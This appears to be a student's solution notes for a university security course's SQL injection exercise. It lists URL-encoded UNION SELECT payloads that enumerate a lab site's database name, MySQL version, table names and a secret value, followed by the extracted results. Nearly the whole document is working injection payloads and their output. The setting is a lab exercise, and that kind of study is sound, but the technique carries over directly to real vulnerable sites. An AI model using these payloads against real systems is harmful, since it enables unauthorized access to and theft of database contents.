
DB Name:
========
http://eecs388.org/project2/sqlinject3/?id=-4321%27%20UNION%20ALL%20SELECT%20NULL%2C%28SELECT%20DATABASE%28%29%29%2CNULL%23

DB Version:
===========
http://eecs388.org/project2/sqlinject3/?id=-1340%27%20UNION%20ALL%20SELECT%20NULL%2C%28select%20%40%40version%29%2CNULL%23


No. of Tables:
==============
http://eecs388.org/project2/sqlinject3/?id=-4434%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x0%2CIFNULL%28CAST%28COUNT%28table_name%29%20AS%20CHAR%29%2C0x20%29%2C0x00%29%2CNULL%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x70726f6a325f787472615f637233646974%29%23


Table Names:
============
SECRETTABLE
- - - - - -
http://eecs388.org/project2/sqlinject3/?id=-9400%27%20UNION%20ALL%20SELECT%20NULL%2C%28SELECT%20CONCAT%280x00%2CIFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%2C0x00%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x70726f6a325f787472615f637233646974%29%20LIMIT%200%2C1%29%2CNULL%23

foo
- -
http://eecs388.org/project2/sqlinject3/?id=-6927%27%20UNION%20ALL%20SELECT%20NULL%2C%28SELECT%20CONCAT%280x0%2CIFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%2C0x00%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x70726f6a325f787472615f637233646974%29%20LIMIT%201%2C1%29%2CNULL%23

inject3_users
- - - - - - -
http://eecs388.org/project2/sqlinject3/?id=-1340%27%20UNION%20ALL%20SELECT%20NULL%2C%28SELECT%20CONCAT%280x00%2CIFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%2C0x00%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x70726f6a325f787472615f637233646974%29%20LIMIT%202%2C1%29%2CNULL%23

Secret String:
==============
http://eecs388.org/project2/sqlinject3/?id=-5364%27%20UNION%20ALL%20SELECT%20NULL%2C(SELECT%20CONCAT(0x0%2CIFNULL(CAST(secret%20AS%20CHAR)%2C0x00)%2C0x000000)%20FROM%20proj2_xtra_cr3dit.SECRETTABLE)%2CNULL%23

Name: proj2_xtra_cr3dit
Version: MySQL 5.5.41 on Ubuntu 14.04.1
Tables: SECRETTABLE,foo,inject3_users
Secret: hunter2







